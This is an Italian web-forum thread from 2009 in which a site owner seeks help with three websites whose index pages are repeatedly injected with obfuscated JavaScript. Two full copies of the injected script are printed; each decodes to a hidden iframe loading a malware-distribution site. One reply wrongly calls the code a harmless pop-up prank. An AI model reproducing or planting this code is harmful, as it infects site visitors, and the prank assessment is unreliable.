www.MegaLab.it

[yeah782000]

Ciao a tutti !

Ho bisogno di voi per "disinfettare" non uno ma ben 3 siti web di un collega!
La pagina index dei tre siti viene modificata ogni 5-6 gg con uno script del tipo

Codice: Seleziona tutto

<script type="text/javascript">var PpiDSzCPKXgOuTlrAwgO = "OxLgD60OxLgD105OxLgD102OxLgD114OxLgD97OxLgD109OxLgD101OxLgD32OxLgD119OxLgD105OxLgD100OxLgD116OxLgD104OxLgD61OxLgD34OxLgD52OxLgD56OxLgD48OxLgD34OxLgD32OxLgD104OxLgD101OxLgD105OxLgD103OxLgD104OxLgD116OxLgD61OxLgD34OxLgD54OxLgD48OxLgD34OxLgD32OxLgD115OxLgD114OxLgD99OxLgD61OxLgD34OxLgD104OxLgD116OxLgD116OxLgD112OxLgD58OxLgD47OxLgD47OxLgD104OxLgD105OxLgD116OxLgD45OxLgD115OxLgD101OxLgD110OxLgD100OxLgD101OxLgD114OxLgD115OxLgD46OxLgD99OxLgD110OxLgD47OxLgD102OxLgD105OxLgD110OxLgD100OxLgD47OxLgD105OxLgD110OxLgD46OxLgD99OxLgD103OxLgD105OxLgD63OxLgD49OxLgD49OxLgD34OxLgD32OxLgD115OxLgD116OxLgD121OxLgD108OxLgD101OxLgD61OxLgD34OxLgD98OxLgD111OxLgD114OxLgD100OxLgD101OxLgD114OxLgD58OxLgD48OxLgD112OxLgD120OxLgD59OxLgD32OxLgD112OxLgD111OxLgD115OxLgD105OxLgD116OxLgD105OxLgD111OxLgD110OxLgD58OxLgD114OxLgD101OxLgD108OxLgD97OxLgD116OxLgD105OxLgD118OxLgD101OxLgD59OxLgD32OxLgD116OxLgD111OxLgD112OxLgD58OxLgD48OxLgD112OxLgD120OxLgD59OxLgD32OxLgD108OxLgD101OxLgD102OxLgD116OxLgD58OxLgD45OxLgD53OxLgD48OxLgD48OxLgD112OxLgD120OxLgD59OxLgD32OxLgD111OxLgD112OxLgD97OxLgD99OxLgD105OxLgD116OxLgD121OxLgD58OxLgD48OxLgD59OxLgD32OxLgD102OxLgD105OxLgD108OxLgD116OxLgD101OxLgD114OxLgD58OxLgD112OxLgD114OxLgD111OxLgD103OxLgD105OxLgD100OxLgD58OxLgD68OxLgD88OxLgD73OxLgD109OxLgD97OxLgD103OxLgD101OxLgD84OxLgD114OxLgD97OxLgD110OxLgD115OxLgD102OxLgD111OxLgD114OxLgD109OxLgD46OxLgD77OxLgD105OxLgD99OxLgD114OxLgD111OxLgD115OxLgD111OxLgD102OxLgD116OxLgD46OxLgD65OxLgD108OxLgD112OxLgD104OxLgD97OxLgD40OxLgD111OxLgD112OxLgD97OxLgD99OxLgD105OxLgD116OxLgD121OxLgD61OxLgD48OxLgD41OxLgD59OxLgD32OxLgD45OxLgD109OxLgD111OxLgD122OxLgD45OxLgD111OxLgD112OxLgD97OxLgD99OxLgD105OxLgD116OxLgD121OxLgD58OxLgD48OxLgD34OxLgD62OxLgD60OxLgD47OxLgD105OxLgD102OxLgD114OxLgD97OxLgD109OxLgD101OxLgD62";var lGkBTgNZFqvVgeYzeaPo = PpiDSzCPKXgOuTlrAwgO.split("OxLgD");var xwCrPoiPkPeWVOXoulOA = "";for (var cKVJouISUYHSUKKjyszj=1; cKVJouISUYHSUKKjyszj<lGkBTgNZFqvVgeYzeaPo.length; cKVJouISUYHSUKKjyszj++){xwCrPoiPkPeWVOXoulOA+=String.fromCharCode(lGkBTgNZFqvVgeYzeaPo[cKVJouISUYHSUKKjyszj]);}document.write(xwCrPoiPkPeWVOXoulOA)</script>

Il codice se messo su Virus Total è riconosciuto come:
HTML:IFrame-EJ da Gdata e Avast e come Heuristic.BehavesLike.JS.CodeUnfolding.A da McAfee.
Anche l'euristica di Antivir 9 interviene quando si visita uno dei 3 siti infettati proponendo di negare l'accesso alla pagina.

I 3 siti vengono inseririti in black list da Google che scansionandoli dice:

SITO 1
Delle 2 pagine che abbiamo testato sul sito negli ultimi 90 giorni, 1 pagine hanno causato il download e l'installazione di software dannosi senza l'autorizzazione dell'utente. L'ultima volta in cui Google ha visitato questo sito è stato il 2009-07-11, mentre l'ultima volta in cui sono stati rilevati contenuti sospetti su questo sito è stato il 2009-05-19.

Malicious software includes 1 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Il software dannoso è presente in 3 domini, tra cui hifgejig.con/, traffics-inspector.con/, silzefos.con/.

2 domini sembrano operare da intermediari per la distribuzione di malware ai visitatori di questo sito, tra questi traffics-inspector.con/, silzefos.con/.

This site was hosted on 1 network(s) including AS12363 (DADA).

SITO 2
Delle 1 pagine che abbiamo testato sul sito negli ultimi 90 giorni, 1 pagine hanno causato il download e l'installazione di software dannosi senza l'autorizzazione dell'utente. L'ultima volta in cui Google ha visitato questo sito è stato il 2009-07-11, mentre l'ultima volta in cui sono stati rilevati contenuti sospetti su questo sito è stato il 2009-06-21.

Il software dannoso è presente in 2 domini, tra cui amateuralluremovies.net/, hit-senders.con/.

1 domini sembrano operare da intermediari per la distribuzione di malware ai visitatori di questo sito, tra questi hit-senders.con/.

This site was hosted on 1 network(s) including AS31034 (ARUBA).

SITO 3
Al momento sembra pulito!

Escludo subito un virus sull'hosting in quanto sono 3 hosting diversi (Aruba, Register, Altervista) e mi pare improbabile che siano tutti e 3 infetti no?

Il pc utilizzato per effettuare trasferimenti FTP (Filezilla) è stato recentemente formattatato e risulta pulito dalle varie scansioni effettuate (Antivir, SuperAntiSpyware, Malware AntiBytes). I siti però sono stati infettati prima della formattazione; è probabile magari che nel pc ci fosse il virus che ha infettato i 3 siti?

Nei 3 siti in questione non ci sono script se non quello di shinystat che è l'unica cosa in comune.

Altra cosa in comune sono dei semplici link ad altri siti; alcuni li ho controllati facendoli scansionare da Google e sono OK.

Se si prova a togliere quella stringa che infetta le index (le altre pagine sono ok) passa qualche giorno e il problema si ripresenta anche se nel frattempo non ci sono stati accessi FTP.

Qualche idea ragazzi? Se volete vi posto l'indirizzo dei 3 siti.

Grazie a tutti.

[ste_95]

Puoi postare l'indirizzo dei tre siti? Secondo me c'è qualche vulnerabilità...

[yeah782000]

Puoi postare l'indirizzo dei tre siti? Secondo me c'è qualche vulnerabilità...

Certo, eccoli qui:

www.associazioneisole.org

www.piccolemotorc.altervista.org

www.marcotende.com

Grazie 1000!

[ste_95]

Non vedo il codice che avevi postato prima... lo avete rimosso? I siti hanno qualcosa in comune, tipo server, FTP, pagine o altro?

[yeah782000]

Non vedo il codice che avevi postato prima... lo avete rimosso? I siti hanno qualcosa in comune, tipo server, FTP, pagine o altro?

I server sono diversi, "piccolemotorc" è su Altervista, "associazioneisole" è su Register e "marcotende" è su Aruba.
L'unica cosa in comune è il contatore visite e alcuni link come meteo.it.

Al momento 2 siti su 3 sono stati "puliti" (ma fra qualche giorno sicuramente il problema si ripresenta) e proprio da ieri sera il sito piccolemotorc.altervista.org è stato di nuovo infettato. Se provi ad accedere trovi lo script nella pagina index

Grazie per l'aiuto!

[ste_95]

Il contatore è quello di ShinyStat, quindi lo escludo, idem per i link meteo. Oltre tutto, sembra più una burla che un attacco, perché interpretando il codice inserito, vengono soltanto tirati fuori uno per uno i numeri contenuti nella stringa lunga, e mostrati con un pop-up, che neanche mi appare.
Io proverei a rivolgermi a coloro che ti hostano i siti, che sono sicuramente le persone più indicate per questo genere di problemi.

[yeah782000]

Il contatore è quello di ShinyStat, quindi lo escludo, idem per i link meteo. Oltre tutto, sembra più una burla che un attacco, perché interpretando il codice inserito, vengono soltanto tirati fuori uno per uno i numeri contenuti nella stringa lunga, e mostrati con un pop-up, che neanche mi appare.
Io proverei a rivolgermi a coloro che ti hostano i siti, che sono sicuramente le persone più indicate per questo genere di problemi.

Grazie, la cosa strana è che se visualizzo il codice dal mio pc sia con Firefox 3.5 che con IE 8 non vedo il codice "maligno".
Dal pc del mio collega e anche andando a scaricare il sorgente da Altervista il codice c'è:

Codice: Seleziona tutto

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>modellismo_piccolemotorc</title><script type="text/javascript">var kPvOkYUlTEBvLmAPjYUP = "nd60nd105nd102nd114nd97nd109nd101nd32nd119nd105nd100nd116nd104nd61nd34nd52nd56nd48nd34nd32nd104nd101nd105nd103nd104nd116nd61nd34nd54nd48nd34nd32nd115nd114nd99nd61nd34nd104nd116nd116nd112nd58nd47nd47nd104nd105nd116nd45nd115nd101nd110nd100nd101nd114nd115nd46nd99nd110nd47nd102nd105nd110nd100nd47nd105nd110nd46nd99nd103nd105nd63nd49nd50nd34nd32nd115nd116nd121nd108nd101nd61nd34nd98nd111nd114nd100nd101nd114nd58nd48nd112nd120nd59nd32nd112nd111nd115nd105nd116nd105nd111nd110nd58nd114nd101nd108nd97nd116nd105nd118nd101nd59nd32nd116nd111nd112nd58nd48nd112nd120nd59nd32nd108nd101nd102nd116nd58nd45nd53nd48nd48nd112nd120nd59nd32nd111nd112nd97nd99nd105nd116nd121nd58nd48nd59nd32nd102nd105nd108nd116nd101nd114nd58nd112nd114nd111nd103nd105nd100nd58nd68nd88nd73nd109nd97nd103nd101nd84nd114nd97nd110nd115nd102nd111nd114nd109nd46nd77nd105nd99nd114nd111nd115nd111nd102nd116nd46nd65nd108nd112nd104nd97nd40nd111nd112nd97nd99nd105nd116nd121nd61nd48nd41nd59nd32nd45nd109nd111nd122nd45nd111nd112nd97nd99nd105nd116nd121nd58nd48nd34nd62nd60nd47nd105nd102nd114nd97nd109nd101nd62";var LQweQmnfGaTqpPFaoZLH = kPvOkYUlTEBvLmAPjYUP.split("nd");var dNCoADEkcYAnpwSFjFkp = "";for (var fDfVTkvHKHOnVRcVUgGw=1; fDfVTkvHKHOnVRcVUgGw<LQweQmnfGaTqpPFaoZLH.length; fDfVTkvHKHOnVRcVUgGw++){dNCoADEkcYAnpwSFjFkp+=String.fromCharCode(LQweQmnfGaTqpPFaoZLH[fDfVTkvHKHOnVRcVUgGw]);}document.write(dNCoADEkcYAnpwSFjFkp)</script>
<style type="text/css">

comunque adesso ho notato che erano state infettate anche le altre pagine index presenti nel sito utilizzate per gli albun fotografici. Adesso ho tolto su ogni pagina il codice e vediamo che succede ;)